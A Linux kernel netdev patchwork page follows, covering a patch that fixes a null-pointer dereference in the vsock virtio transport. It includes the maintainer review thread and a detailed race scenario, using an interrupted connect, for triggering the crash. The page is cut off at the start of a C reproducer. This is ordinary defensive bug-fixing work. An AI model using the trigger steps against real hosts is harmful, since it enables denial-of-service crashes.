diff mbox series

vsock/virtio: Fix null-ptr-deref in vsock_stream_has_data

Message ID Z2K/I4nlHdfMRTZC@v4bel-B760M-AORUS-ELITE-AX (mailing list archive)
State Changes Requested
Delegated to: Netdev Maintainers
Headers show
Series vsock/virtio: Fix null-ptr-deref in vsock_stream_has_data | expand

Checks

Context Check Description
netdev/series_format warning Single patches do not need cover letters; Target tree name not specified in the subject
netdev/tree_selection success Guessed tree name to be net-next
netdev/ynl success Generated files up to date; no warnings/errors; no diff in generated;
netdev/fixes_present success Fixes tag not required for -next series
netdev/header_inline success No static functions without inline keyword in header files
netdev/build_32bit success Errors and warnings before: 0 this patch: 0
netdev/build_tools success No tools touched, skip
netdev/cc_maintainers fail 1 blamed authors not CCed: stefanha@redhat.com; 1 maintainers not CCed: stefanha@redhat.com
netdev/build_clang success Errors and warnings before: 1 this patch: 1
netdev/verify_signedoff success Signed-off-by tag matches author and committer
netdev/deprecated_api success None detected
netdev/check_selftest success No net selftest shell script
netdev/verify_fixes success Fixes tag looks correct
netdev/build_allmodconfig_warn success Errors and warnings before: 0 this patch: 0
netdev/checkpatch success total: 0 errors, 0 warnings, 0 checks, 9 lines checked
netdev/build_clang_rust success No Rust files in patch. Skipping build
netdev/kdoc success Errors and warnings before: 0 this patch: 0
netdev/source_inline success Was 0 now: 0
netdev/contest success net-next-2024-12-19--00-00 (tests: 880)

Commit Message

Hyunwoo Kim Dec. 18, 2024, 12:25 p.m. UTC
When calling connect to change the CID of a vsock, the loopback
worker for the VIRTIO_VSOCK_OP_RST command is invoked.
During this process, vsock_stream_has_data() calls
vsk->transport->stream_has_data().
However, a null-ptr-deref occurs because vsk->transport was set
to NULL in vsock_deassign_transport().

                     cpu0                                                      cpu1

                                                               socket(A)

                                                               bind(A, VMADDR_CID_LOCAL)
                                                                 vsock_bind()

                                                               listen(A)
                                                                 vsock_listen()
  socket(B)

  connect(B, VMADDR_CID_LOCAL)

  connect(B, VMADDR_CID_HYPERVISOR)
    vsock_connect(B)
      lock_sock(sk);
      vsock_assign_transport()
        virtio_transport_release()
          virtio_transport_close()
            virtio_transport_shutdown()
              virtio_transport_send_pkt_info()
                vsock_loopback_send_pkt(VIRTIO_VSOCK_OP_SHUTDOWN)
                  queue_work(vsock_loopback_work)
        vsock_deassign_transport()
          vsk->transport = NULL;
                                                               vsock_loopback_work()
                                                                 virtio_transport_recv_pkt(VIRTIO_VSOCK_OP_SHUTDOWN)
                                                                   virtio_transport_recv_connected()
                                                                     virtio_transport_reset()
                                                                       virtio_transport_send_pkt_info()
                                                                         vsock_loopback_send_pkt(VIRTIO_VSOCK_OP_RST)
                                                                           queue_work(vsock_loopback_work)

                                                               vsock_loopback_work()
                                                                 virtio_transport_recv_pkt(VIRTIO_VSOCK_OP_RST)
								   virtio_transport_recv_disconnecting()
								     virtio_transport_do_close()
								       vsock_stream_has_data()
								         vsk->transport->stream_has_data(vsk);    // null-ptr-deref

To resolve this issue, add a check for vsk->transport, similar to
functions like vsock_send_shutdown().

Fixes: fe502c4a38d9 ("vsock: add 'transport' member in the struct vsock_sock")
Signed-off-by: Hyunwoo Kim <v4bel@theori.io>
Signed-off-by: Wongi Lee <qwerty@theori.io>
---
 net/vmw_vsock/af_vsock.c | 3 +++
 1 file changed, 3 insertions(+)

Comments

Stefano Garzarella Dec. 18, 2024, 1:40 p.m. UTC | #1
On Wed, Dec 18, 2024 at 07:25:07AM -0500, Hyunwoo Kim wrote:
>When calling connect to change the CID of a vsock, the loopback
>worker for the VIRTIO_VSOCK_OP_RST command is invoked.
>During this process, vsock_stream_has_data() calls
>vsk->transport->stream_has_data().
>However, a null-ptr-deref occurs because vsk->transport was set
>to NULL in vsock_deassign_transport().
>
>                     cpu0                                                      cpu1
>
>                                                               socket(A)
>
>                                                               bind(A, VMADDR_CID_LOCAL)
>                                                                 vsock_bind()
>
>                                                               listen(A)
>                                                                 vsock_listen()
>  socket(B)
>
>  connect(B, VMADDR_CID_LOCAL)
>
>  connect(B, VMADDR_CID_HYPERVISOR)
>    vsock_connect(B)
>      lock_sock(sk);
>      vsock_assign_transport()
>        virtio_transport_release()
>          virtio_transport_close()
>            virtio_transport_shutdown()
>              virtio_transport_send_pkt_info()
>                vsock_loopback_send_pkt(VIRTIO_VSOCK_OP_SHUTDOWN)
>                  queue_work(vsock_loopback_work)
>        vsock_deassign_transport()
>          vsk->transport = NULL;
>                                                               vsock_loopback_work()
>                                                                 virtio_transport_recv_pkt(VIRTIO_VSOCK_OP_SHUTDOWN)
>                                                                   virtio_transport_recv_connected()
>                                                                     virtio_transport_reset()
>                                                                       virtio_transport_send_pkt_info()
>                                                                         vsock_loopback_send_pkt(VIRTIO_VSOCK_OP_RST)
>                                                                           queue_work(vsock_loopback_work)
>
>                                                               vsock_loopback_work()
>                                                                 virtio_transport_recv_pkt(VIRTIO_VSOCK_OP_RST)
>								   virtio_transport_recv_disconnecting()
>								     virtio_transport_do_close()
>								       vsock_stream_has_data()
>								         vsk->transport->stream_has_data(vsk);    // null-ptr-deref
>
>To resolve this issue, add a check for vsk->transport, similar to
>functions like vsock_send_shutdown().
>
>Fixes: fe502c4a38d9 ("vsock: add 'transport' member in the struct vsock_sock")
>Signed-off-by: Hyunwoo Kim <v4bel@theori.io>
>Signed-off-by: Wongi Lee <qwerty@theori.io>
>---
> net/vmw_vsock/af_vsock.c | 3 +++
> 1 file changed, 3 insertions(+)
>
>diff --git a/net/vmw_vsock/af_vsock.c b/net/vmw_vsock/af_vsock.c
>index 5cf8109f672a..a0c008626798 100644
>--- a/net/vmw_vsock/af_vsock.c
>+++ b/net/vmw_vsock/af_vsock.c
>@@ -870,6 +870,9 @@ EXPORT_SYMBOL_GPL(vsock_create_connected);
>
> s64 vsock_stream_has_data(struct vsock_sock *vsk)
> {
>+	if (!vsk->transport)
>+		return 0;
>+

I understand that this alleviates the problem, but IMO it is not the 
right solution. We should understand why we're still processing the 
packet in the context of this socket if it's no longer assigned to the 
right transport.

Maybe we can try to improve virtio_transport_recv_pkt() and check if the 
vsk->transport is what we expect, I mean something like this (untested):

diff --git a/net/vmw_vsock/virtio_transport_common.c b/net/vmw_vsock/virtio_transport_common.c
index 9acc13ab3f82..18b91149a62e 100644
--- a/net/vmw_vsock/virtio_transport_common.c
+++ b/net/vmw_vsock/virtio_transport_common.c
@@ -1628,8 +1628,10 @@ void virtio_transport_recv_pkt(struct virtio_transport *t,

         lock_sock(sk);

-       /* Check if sk has been closed before lock_sock */
-       if (sock_flag(sk, SOCK_DONE)) {
+       /* Check if sk has been closed or assigned to another transport before
+        * lock_sock
+        */
+       if (sock_flag(sk, SOCK_DONE) || vsk->transport != t) {
                 (void)virtio_transport_reset_no_sock(t, skb);
                 release_sock(sk);
                 sock_put(sk);

BTW I'm not sure it is the best solution, we have to check that we do 
not introduce strange cases, but IMHO we have to solve the problem 
earlier in virtio_transport_recv_pkt().

Thanks,
Stefano

> 	return vsk->transport->stream_has_data(vsk);
> }
> EXPORT_SYMBOL_GPL(vsock_stream_has_data);
>-- 
>2.34.1
>
Hyunwoo Kim Dec. 18, 2024, 2:19 p.m. UTC | #2
On Wed, Dec 18, 2024 at 02:40:49PM +0100, Stefano Garzarella wrote:
> On Wed, Dec 18, 2024 at 07:25:07AM -0500, Hyunwoo Kim wrote:
> > When calling connect to change the CID of a vsock, the loopback
> > worker for the VIRTIO_VSOCK_OP_RST command is invoked.
> > During this process, vsock_stream_has_data() calls
> > vsk->transport->stream_has_data().
> > However, a null-ptr-deref occurs because vsk->transport was set
> > to NULL in vsock_deassign_transport().
> > 
> >                     cpu0                                                      cpu1
> > 
> >                                                               socket(A)
> > 
> >                                                               bind(A, VMADDR_CID_LOCAL)
> >                                                                 vsock_bind()
> > 
> >                                                               listen(A)
> >                                                                 vsock_listen()
> >  socket(B)
> > 
> >  connect(B, VMADDR_CID_LOCAL)
> > 
> >  connect(B, VMADDR_CID_HYPERVISOR)
> >    vsock_connect(B)
> >      lock_sock(sk);
> >      vsock_assign_transport()
> >        virtio_transport_release()
> >          virtio_transport_close()
> >            virtio_transport_shutdown()
> >              virtio_transport_send_pkt_info()
> >                vsock_loopback_send_pkt(VIRTIO_VSOCK_OP_SHUTDOWN)
> >                  queue_work(vsock_loopback_work)
> >        vsock_deassign_transport()
> >          vsk->transport = NULL;
> >                                                               vsock_loopback_work()
> >                                                                 virtio_transport_recv_pkt(VIRTIO_VSOCK_OP_SHUTDOWN)
> >                                                                   virtio_transport_recv_connected()
> >                                                                     virtio_transport_reset()
> >                                                                       virtio_transport_send_pkt_info()
> >                                                                         vsock_loopback_send_pkt(VIRTIO_VSOCK_OP_RST)
> >                                                                           queue_work(vsock_loopback_work)
> > 
> >                                                               vsock_loopback_work()
> >                                                                 virtio_transport_recv_pkt(VIRTIO_VSOCK_OP_RST)
> > 								   virtio_transport_recv_disconnecting()
> > 								     virtio_transport_do_close()
> > 								       vsock_stream_has_data()
> > 								         vsk->transport->stream_has_data(vsk);    // null-ptr-deref
> > 
> > To resolve this issue, add a check for vsk->transport, similar to
> > functions like vsock_send_shutdown().
> > 
> > Fixes: fe502c4a38d9 ("vsock: add 'transport' member in the struct vsock_sock")
> > Signed-off-by: Hyunwoo Kim <v4bel@theori.io>
> > Signed-off-by: Wongi Lee <qwerty@theori.io>
> > ---
> > net/vmw_vsock/af_vsock.c | 3 +++
> > 1 file changed, 3 insertions(+)
> > 
> > diff --git a/net/vmw_vsock/af_vsock.c b/net/vmw_vsock/af_vsock.c
> > index 5cf8109f672a..a0c008626798 100644
> > --- a/net/vmw_vsock/af_vsock.c
> > +++ b/net/vmw_vsock/af_vsock.c
> > @@ -870,6 +870,9 @@ EXPORT_SYMBOL_GPL(vsock_create_connected);
> > 
> > s64 vsock_stream_has_data(struct vsock_sock *vsk)
> > {
> > +	if (!vsk->transport)
> > +		return 0;
> > +
> 
> I understand that this alleviates the problem, but IMO it is not the right
> solution. We should understand why we're still processing the packet in the
> context of this socket if it's no longer assigned to the right transport.

Got it. I agree with you.

> 
> Maybe we can try to improve virtio_transport_recv_pkt() and check if the
> vsk->transport is what we expect, I mean something like this (untested):
> 
> diff --git a/net/vmw_vsock/virtio_transport_common.c b/net/vmw_vsock/virtio_transport_common.c
> index 9acc13ab3f82..18b91149a62e 100644
> --- a/net/vmw_vsock/virtio_transport_common.c
> +++ b/net/vmw_vsock/virtio_transport_common.c
> @@ -1628,8 +1628,10 @@ void virtio_transport_recv_pkt(struct virtio_transport *t,
> 
>         lock_sock(sk);
> 
> -       /* Check if sk has been closed before lock_sock */
> -       if (sock_flag(sk, SOCK_DONE)) {
> +       /* Check if sk has been closed or assigned to another transport before
> +        * lock_sock
> +        */
> +       if (sock_flag(sk, SOCK_DONE) || vsk->transport != t) {
>                 (void)virtio_transport_reset_no_sock(t, skb);
>                 release_sock(sk);
>                 sock_put(sk);
> 
> BTW I'm not sure it is the best solution, we have to check that we do not
> introduce strange cases, but IMHO we have to solve the problem earlier in
> virtio_transport_recv_pkt().

At least for vsock_loopback.c, this change doesn’t seem to introduce any 
particular issues.

And separately, I think applying the vsock_stream_has_data patch would help 
prevent potential issues that could arise when vsock_stream_has_data is 
called somewhere.

> 
> Thanks,
> Stefano
> 
> > 	return vsk->transport->stream_has_data(vsk);
> > }
> > EXPORT_SYMBOL_GPL(vsock_stream_has_data);
> > -- 
> > 2.34.1
> > 
>
Stefano Garzarella Dec. 18, 2024, 2:40 p.m. UTC | #3
On Wed, Dec 18, 2024 at 09:19:08AM -0500, Hyunwoo Kim wrote:
>On Wed, Dec 18, 2024 at 02:40:49PM +0100, Stefano Garzarella wrote:
>> On Wed, Dec 18, 2024 at 07:25:07AM -0500, Hyunwoo Kim wrote:
>> > When calling connect to change the CID of a vsock, the loopback
>> > worker for the VIRTIO_VSOCK_OP_RST command is invoked.
>> > During this process, vsock_stream_has_data() calls
>> > vsk->transport->stream_has_data().
>> > However, a null-ptr-deref occurs because vsk->transport was set
>> > to NULL in vsock_deassign_transport().
>> >
>> >                     cpu0                                                      cpu1
>> >
>> >                                                               socket(A)
>> >
>> >                                                               bind(A, VMADDR_CID_LOCAL)
>> >                                                                 vsock_bind()
>> >
>> >                                                               listen(A)
>> >                                                                 vsock_listen()
>> >  socket(B)
>> >
>> >  connect(B, VMADDR_CID_LOCAL)
>> >
>> >  connect(B, VMADDR_CID_HYPERVISOR)
>> >    vsock_connect(B)
>> >      lock_sock(sk);
>> >      vsock_assign_transport()
>> >        virtio_transport_release()
>> >          virtio_transport_close()
>> >            virtio_transport_shutdown()
>> >              virtio_transport_send_pkt_info()
>> >                vsock_loopback_send_pkt(VIRTIO_VSOCK_OP_SHUTDOWN)
>> >                  queue_work(vsock_loopback_work)
>> >        vsock_deassign_transport()
>> >          vsk->transport = NULL;
>> >                                                               vsock_loopback_work()
>> >                                                                 virtio_transport_recv_pkt(VIRTIO_VSOCK_OP_SHUTDOWN)
>> >                                                                   virtio_transport_recv_connected()
>> >                                                                     virtio_transport_reset()
>> >                                                                       virtio_transport_send_pkt_info()
>> >                                                                         vsock_loopback_send_pkt(VIRTIO_VSOCK_OP_RST)
>> >                                                                           queue_work(vsock_loopback_work)
>> >
>> >                                                               vsock_loopback_work()
>> >                                                                 virtio_transport_recv_pkt(VIRTIO_VSOCK_OP_RST)
>> > 								   virtio_transport_recv_disconnecting()
>> > 								     virtio_transport_do_close()
>> > 								       vsock_stream_has_data()
>> > 								         vsk->transport->stream_has_data(vsk);    // null-ptr-deref
>> >
>> > To resolve this issue, add a check for vsk->transport, similar to
>> > functions like vsock_send_shutdown().
>> >
>> > Fixes: fe502c4a38d9 ("vsock: add 'transport' member in the struct vsock_sock")
>> > Signed-off-by: Hyunwoo Kim <v4bel@theori.io>
>> > Signed-off-by: Wongi Lee <qwerty@theori.io>
>> > ---
>> > net/vmw_vsock/af_vsock.c | 3 +++
>> > 1 file changed, 3 insertions(+)
>> >
>> > diff --git a/net/vmw_vsock/af_vsock.c b/net/vmw_vsock/af_vsock.c
>> > index 5cf8109f672a..a0c008626798 100644
>> > --- a/net/vmw_vsock/af_vsock.c
>> > +++ b/net/vmw_vsock/af_vsock.c
>> > @@ -870,6 +870,9 @@ EXPORT_SYMBOL_GPL(vsock_create_connected);
>> >
>> > s64 vsock_stream_has_data(struct vsock_sock *vsk)
>> > {
>> > +	if (!vsk->transport)
>> > +		return 0;
>> > +
>>
>> I understand that this alleviates the problem, but IMO it is not the right
>> solution. We should understand why we're still processing the packet in the
>> context of this socket if it's no longer assigned to the right transport.
>
>Got it. I agree with you.
>
>>
>> Maybe we can try to improve virtio_transport_recv_pkt() and check if the
>> vsk->transport is what we expect, I mean something like this (untested):
>>
>> diff --git a/net/vmw_vsock/virtio_transport_common.c b/net/vmw_vsock/virtio_transport_common.c
>> index 9acc13ab3f82..18b91149a62e 100644
>> --- a/net/vmw_vsock/virtio_transport_common.c
>> +++ b/net/vmw_vsock/virtio_transport_common.c
>> @@ -1628,8 +1628,10 @@ void virtio_transport_recv_pkt(struct virtio_transport *t,
>>
>>         lock_sock(sk);
>>
>> -       /* Check if sk has been closed before lock_sock */
>> -       if (sock_flag(sk, SOCK_DONE)) {
>> +       /* Check if sk has been closed or assigned to another transport before
>> +        * lock_sock
>> +        */
>> +       if (sock_flag(sk, SOCK_DONE) || vsk->transport != t) {
>>                 (void)virtio_transport_reset_no_sock(t, skb);
>>                 release_sock(sk);
>>                 sock_put(sk);
>>
>> BTW I'm not sure it is the best solution, we have to check that we do not
>> introduce strange cases, but IMHO we have to solve the problem earlier in
>> virtio_transport_recv_pkt().
>
>At least for vsock_loopback.c, this change doesn’t seem to introduce any
>particular issues.

But was it working for you? because the check was wrong, this one should 
work, but still, I didn't have time to test it properly, I'll do later.

diff --git a/net/vmw_vsock/virtio_transport_common.c b/net/vmw_vsock/virtio_transport_common.c
index 9acc13ab3f82..ddecf6e430d6 100644
--- a/net/vmw_vsock/virtio_transport_common.c
+++ b/net/vmw_vsock/virtio_transport_common.c
@@ -1628,8 +1628,10 @@ void virtio_transport_recv_pkt(struct virtio_transport *t,
  
         lock_sock(sk);
  
-       /* Check if sk has been closed before lock_sock */
-       if (sock_flag(sk, SOCK_DONE)) {
+       /* Check if sk has been closed or assigned to another transport before
+        * lock_sock
+        */
+       if (sock_flag(sk, SOCK_DONE) || vsk->transport != &t->transport) {
                 (void)virtio_transport_reset_no_sock(t, skb);
                 release_sock(sk);
                 sock_put(sk);

>
>And separately, I think applying the vsock_stream_has_data patch would help
>prevent potential issues that could arise when vsock_stream_has_data is
>called somewhere.

Not sure, with that check, we wouldn't have seen this problem we had, so 
either add an error, but mute it like this I don't think is a good idea, 
also because the same function is used in a hot path, so an extra check 
could affect performance (not much honestly in this case, but adding it 
anywhere could).

Thanks,
Stefano

>
>>
>> Thanks,
>> Stefano
>>
>> > 	return vsk->transport->stream_has_data(vsk);
>> > }
>> > EXPORT_SYMBOL_GPL(vsock_stream_has_data);
>> > --
>> > 2.34.1
>> >
>>
>
Stefano Garzarella Dec. 18, 2024, 3:31 p.m. UTC | #4
On Wed, Dec 18, 2024 at 03:40:40PM +0100, Stefano Garzarella wrote:
>On Wed, Dec 18, 2024 at 09:19:08AM -0500, Hyunwoo Kim wrote:
>>On Wed, Dec 18, 2024 at 02:40:49PM +0100, Stefano Garzarella wrote:
>>>On Wed, Dec 18, 2024 at 07:25:07AM -0500, Hyunwoo Kim wrote:
>>>> When calling connect to change the CID of a vsock, the loopback
>>>> worker for the VIRTIO_VSOCK_OP_RST command is invoked.
>>>> During this process, vsock_stream_has_data() calls
>>>> vsk->transport->stream_has_data().
>>>> However, a null-ptr-deref occurs because vsk->transport was set
>>>> to NULL in vsock_deassign_transport().
>>>>
>>>>                     cpu0                                                      cpu1
>>>>
>>>>                                                               socket(A)
>>>>
>>>>                                                               bind(A, VMADDR_CID_LOCAL)
>>>>                                                                 vsock_bind()
>>>>
>>>>                                                               listen(A)
>>>>                                                                 vsock_listen()
>>>>  socket(B)
>>>>
>>>>  connect(B, VMADDR_CID_LOCAL)
>>>>
>>>>  connect(B, VMADDR_CID_HYPERVISOR)
>>>>    vsock_connect(B)
>>>>      lock_sock(sk);

It shouldn't go on here anyway, because there's this check in 
vsock_connect():

	switch (sock->state) {
	case SS_CONNECTED:
		err = -EISCONN;
		goto out;


Indeed if I try, I have this behaviour:

shell1# python3
import socket
s = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
s.bind((1,1234))
s.listen()

shell2# python3
import socket
s = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
s.connect((1, 1234))
s.connect((2, 1234))
Traceback (most recent call last):
   File "<stdin>", line 1, in <module>
OSError: [Errno 106] Transport endpoint is already connected


Where 106 is exactly EISCONN.
So, do you have a better reproducer for that?

Would be nice to add a test in tools/testing/vsock/vsock_test.c

Thanks,
Stefano

>>>>      vsock_assign_transport()
>>>>        virtio_transport_release()
>>>>          virtio_transport_close()
>>>>            virtio_transport_shutdown()
>>>>              virtio_transport_send_pkt_info()
>>>>                vsock_loopback_send_pkt(VIRTIO_VSOCK_OP_SHUTDOWN)
>>>>                  queue_work(vsock_loopback_work)
>>>>        vsock_deassign_transport()
>>>>          vsk->transport = NULL;
>>>>                                                               vsock_loopback_work()
>>>>                                                                 virtio_transport_recv_pkt(VIRTIO_VSOCK_OP_SHUTDOWN)
>>>>                                                                   virtio_transport_recv_connected()
>>>>                                                                     virtio_transport_reset()
>>>>                                                                       virtio_transport_send_pkt_info()
>>>>                                                                         vsock_loopback_send_pkt(VIRTIO_VSOCK_OP_RST)
>>>>                                                                           queue_work(vsock_loopback_work)
>>>>
>>>>                                                               vsock_loopback_work()
>>>>                                                                 virtio_transport_recv_pkt(VIRTIO_VSOCK_OP_RST)
>>>> 								   virtio_transport_recv_disconnecting()
>>>> 								     virtio_transport_do_close()
>>>> 								       vsock_stream_has_data()
>>>> 								         vsk->transport->stream_has_data(vsk);    // null-ptr-deref
>>>>
>>>> To resolve this issue, add a check for vsk->transport, similar to
>>>> functions like vsock_send_shutdown().
>>>>
>>>> Fixes: fe502c4a38d9 ("vsock: add 'transport' member in the struct vsock_sock")
>>>> Signed-off-by: Hyunwoo Kim <v4bel@theori.io>
>>>> Signed-off-by: Wongi Lee <qwerty@theori.io>
>>>> ---
>>>> net/vmw_vsock/af_vsock.c | 3 +++
>>>> 1 file changed, 3 insertions(+)
>>>>
>>>> diff --git a/net/vmw_vsock/af_vsock.c b/net/vmw_vsock/af_vsock.c
>>>> index 5cf8109f672a..a0c008626798 100644
>>>> --- a/net/vmw_vsock/af_vsock.c
>>>> +++ b/net/vmw_vsock/af_vsock.c
>>>> @@ -870,6 +870,9 @@ EXPORT_SYMBOL_GPL(vsock_create_connected);
>>>>
>>>> s64 vsock_stream_has_data(struct vsock_sock *vsk)
>>>> {
>>>> +	if (!vsk->transport)
>>>> +		return 0;
>>>> +
>>>
>>>I understand that this alleviates the problem, but IMO it is not the right
>>>solution. We should understand why we're still processing the packet in the
>>>context of this socket if it's no longer assigned to the right transport.
>>
>>Got it. I agree with you.
>>
>>>
>>>Maybe we can try to improve virtio_transport_recv_pkt() and check if the
>>>vsk->transport is what we expect, I mean something like this (untested):
>>>
>>>diff --git a/net/vmw_vsock/virtio_transport_common.c b/net/vmw_vsock/virtio_transport_common.c
>>>index 9acc13ab3f82..18b91149a62e 100644
>>>--- a/net/vmw_vsock/virtio_transport_common.c
>>>+++ b/net/vmw_vsock/virtio_transport_common.c
>>>@@ -1628,8 +1628,10 @@ void virtio_transport_recv_pkt(struct virtio_transport *t,
>>>
>>>        lock_sock(sk);
>>>
>>>-       /* Check if sk has been closed before lock_sock */
>>>-       if (sock_flag(sk, SOCK_DONE)) {
>>>+       /* Check if sk has been closed or assigned to another transport before
>>>+        * lock_sock
>>>+        */
>>>+       if (sock_flag(sk, SOCK_DONE) || vsk->transport != t) {
>>>                (void)virtio_transport_reset_no_sock(t, skb);
>>>                release_sock(sk);
>>>                sock_put(sk);
>>>
>>>BTW I'm not sure it is the best solution, we have to check that we do not
>>>introduce strange cases, but IMHO we have to solve the problem earlier in
>>>virtio_transport_recv_pkt().
>>
>>At least for vsock_loopback.c, this change doesn’t seem to introduce any
>>particular issues.
>
>But was it working for you? because the check was wrong, this one 
>should work, but still, I didn't have time to test it properly, I'll 
>do later.
>
>diff --git a/net/vmw_vsock/virtio_transport_common.c b/net/vmw_vsock/virtio_transport_common.c
>index 9acc13ab3f82..ddecf6e430d6 100644
>--- a/net/vmw_vsock/virtio_transport_common.c
>+++ b/net/vmw_vsock/virtio_transport_common.c
>@@ -1628,8 +1628,10 @@ void virtio_transport_recv_pkt(struct virtio_transport *t,
>        lock_sock(sk);
>-       /* Check if sk has been closed before lock_sock */
>-       if (sock_flag(sk, SOCK_DONE)) {
>+       /* Check if sk has been closed or assigned to another transport before
>+        * lock_sock
>+        */
>+       if (sock_flag(sk, SOCK_DONE) || vsk->transport != &t->transport) {
>                (void)virtio_transport_reset_no_sock(t, skb);
>                release_sock(sk);
>                sock_put(sk);
>
>>
>>And separately, I think applying the vsock_stream_has_data patch would help
>>prevent potential issues that could arise when vsock_stream_has_data is
>>called somewhere.
>
>Not sure, with that check, we wouldn't have seen this problem we had, 
>so either add an error, but mute it like this I don't think is a good 
>idea, also because the same function is used in a hot path, so an 
>extra check could affect performance (not much honestly in this case, 
>but adding it anywhere could).
>
>Thanks,
>Stefano
>
>>
>>>
>>>Thanks,
>>>Stefano
>>>
>>>> 	return vsk->transport->stream_has_data(vsk);
>>>> }
>>>> EXPORT_SYMBOL_GPL(vsock_stream_has_data);
>>>> --
>>>> 2.34.1
>>>>
>>>
>>
Hyunwoo Kim Dec. 18, 2024, 3:51 p.m. UTC | #5
On Wed, Dec 18, 2024 at 04:31:03PM +0100, Stefano Garzarella wrote:
> On Wed, Dec 18, 2024 at 03:40:40PM +0100, Stefano Garzarella wrote:
> > On Wed, Dec 18, 2024 at 09:19:08AM -0500, Hyunwoo Kim wrote:
> > > On Wed, Dec 18, 2024 at 02:40:49PM +0100, Stefano Garzarella wrote:
> > > > On Wed, Dec 18, 2024 at 07:25:07AM -0500, Hyunwoo Kim wrote:
> > > > > When calling connect to change the CID of a vsock, the loopback
> > > > > worker for the VIRTIO_VSOCK_OP_RST command is invoked.
> > > > > During this process, vsock_stream_has_data() calls
> > > > > vsk->transport->stream_has_data().
> > > > > However, a null-ptr-deref occurs because vsk->transport was set
> > > > > to NULL in vsock_deassign_transport().
> > > > > 
> > > > >                     cpu0                                                      cpu1
> > > > > 
> > > > >                                                               socket(A)
> > > > > 
> > > > >                                                               bind(A, VMADDR_CID_LOCAL)
> > > > >                                                                 vsock_bind()
> > > > > 
> > > > >                                                               listen(A)
> > > > >                                                                 vsock_listen()
> > > > >  socket(B)
> > > > > 
> > > > >  connect(B, VMADDR_CID_LOCAL)
> > > > > 
> > > > >  connect(B, VMADDR_CID_HYPERVISOR)
> > > > >    vsock_connect(B)
> > > > >      lock_sock(sk);
> 
> It shouldn't go on here anyway, because there's this check in
> vsock_connect():
> 
> 	switch (sock->state) {
> 	case SS_CONNECTED:
> 		err = -EISCONN;
> 		goto out;

By using a kill signal, set sock->state to SS_UNCONNECTED and sk->sk_state to 
TCP_CLOSING before the second connect() is called, causing the worker to 
execute without the SOCK_DONE flag being set.

> 
> 
> Indeed if I try, I have this behaviour:
> 
> shell1# python3
> import socket
> s = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
> s.bind((1,1234))
> s.listen()
> 
> shell2# python3
> import socket
> s = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
> s.connect((1, 1234))
> s.connect((2, 1234))
> Traceback (most recent call last):
>   File "<stdin>", line 1, in <module>
> OSError: [Errno 106] Transport endpoint is already connected
> 
> 
> Where 106 is exactly EISCONN.
> So, do you have a better reproducer for that?

The full scenario is as follows:
```
                     cpu0                                                      cpu1

                                                               socket(A)

                                                               bind(A, {cid: VMADDR_CID_LOCAL, port: 1024})
                                                                 vsock_bind()

                                                               listen(A)
                                                                 vsock_listen()
  socket(B)

  connect(B, {cid: VMADDR_CID_LOCAL, port: 1024})
    vsock_connect()
      lock_sock(sk);
      virtio_transport_connect()
        virtio_transport_connect()
          virtio_transport_send_pkt_info()
            vsock_loopback_send_pkt(VIRTIO_VSOCK_OP_REQUEST)
              queue_work(vsock_loopback_work)
      sk->sk_state = TCP_SYN_SENT;
      release_sock(sk);
                                                               vsock_loopback_work()
                                                                 virtio_transport_recv_pkt(VIRTIO_VSOCK_OP_REQUEST)
                                                                   sk = vsock_find_bound_socket(&dst);
                                                                   virtio_transport_recv_listen(sk, skb)
                                                                     child = vsock_create_connected(sk);
                                                                     vsock_assign_transport()
                                                                       vvs = kzalloc(sizeof(*vvs), GFP_KERNEL);
                                                                     vsock_insert_connected(vchild);
                                                                       list_add(&vsk->connected_table, list);
                                                                     virtio_transport_send_response(vchild, skb);
                                                                       virtio_transport_send_pkt_info()
                                                                         vsock_loopback_send_pkt(VIRTIO_VSOCK_OP_RESPONSE)
                                                                           queue_work(vsock_loopback_work)

                                                               vsock_loopback_work()
                                                                 virtio_transport_recv_pkt(VIRTIO_VSOCK_OP_RESPONSE)
                                                                   sk = vsock_find_bound_socket(&dst);
                                                                   lock_sock(sk);
                                                                   case TCP_SYN_SENT:
                                                                   virtio_transport_recv_connecting()
                                                                     sk->sk_state = TCP_ESTABLISHED;
                                                                   release_sock(sk);

                                                               kill(connect(B));
      lock_sock(sk);
      if (signal_pending(current)) {
      sk->sk_state = sk->sk_state == TCP_ESTABLISHED ? TCP_CLOSING : TCP_CLOSE;
      sock->state = SS_UNCONNECTED;
      release_sock(sk);

  connect(B, {cid: VMADDR_CID_HYPERVISOR, port: 1024})
    vsock_connect(B)
      lock_sock(sk);
      vsock_assign_transport()
        virtio_transport_release()
          virtio_transport_close()
            if (!(sk->sk_state == TCP_ESTABLISHED || sk->sk_state == TCP_CLOSING))
            virtio_transport_shutdown()
              virtio_transport_send_pkt_info()
                vsock_loopback_send_pkt(VIRTIO_VSOCK_OP_SHUTDOWN)
                  queue_work(vsock_loopback_work)
        vsock_deassign_transport()
          vsk->transport = NULL;
        return -ESOCKTNOSUPPORT;
      release_sock(sk);
                                                               vsock_loopback_work()
                                                                 virtio_transport_recv_pkt(VIRTIO_VSOCK_OP_SHUTDOWN)
                                                                   virtio_transport_recv_connected()
                                                                     virtio_transport_reset()
                                                                       virtio_transport_send_pkt_info()
                                                                         vsock_loopback_send_pkt(VIRTIO_VSOCK_OP_RST)
                                                                           queue_work(vsock_loopback_work)

                                                               vsock_loopback_work()
                                                                 virtio_transport_recv_pkt(VIRTIO_VSOCK_OP_RST)
								   virtio_transport_recv_disconnecting()
								     virtio_transport_do_close()
								       vsock_stream_has_data()
								         vsk->transport->stream_has_data(vsk);    // null-ptr-deref
```

And the reproducer I used is as follows, but since it’s a race condition, 
triggering it might take a long time depending on the environment. 
Therefore, it’s a good idea to add an mdelay to the appropriate vsock function:
```
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <linux/vm_sockets.h>
#include <unistd.h>
#include <pthread.h>
#include <fcntl.h>
#include <syscall.h>
#include <stdarg.h>
#include <sched.h>
#include <signal.h>
#include <time.h>
#include <errno.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/times.h>
#include <sys/timerfd.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <stddef.h>
#include <linux/types.h>
#include <stdint.h>
#include <linux/keyctl.h>
#include <stdio.h>
#include <stdlib.h>
#include <syscall.h>
#include <stdarg.h>
#include <sched.h>
#include <signal.h>
#include <time.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <string.h>
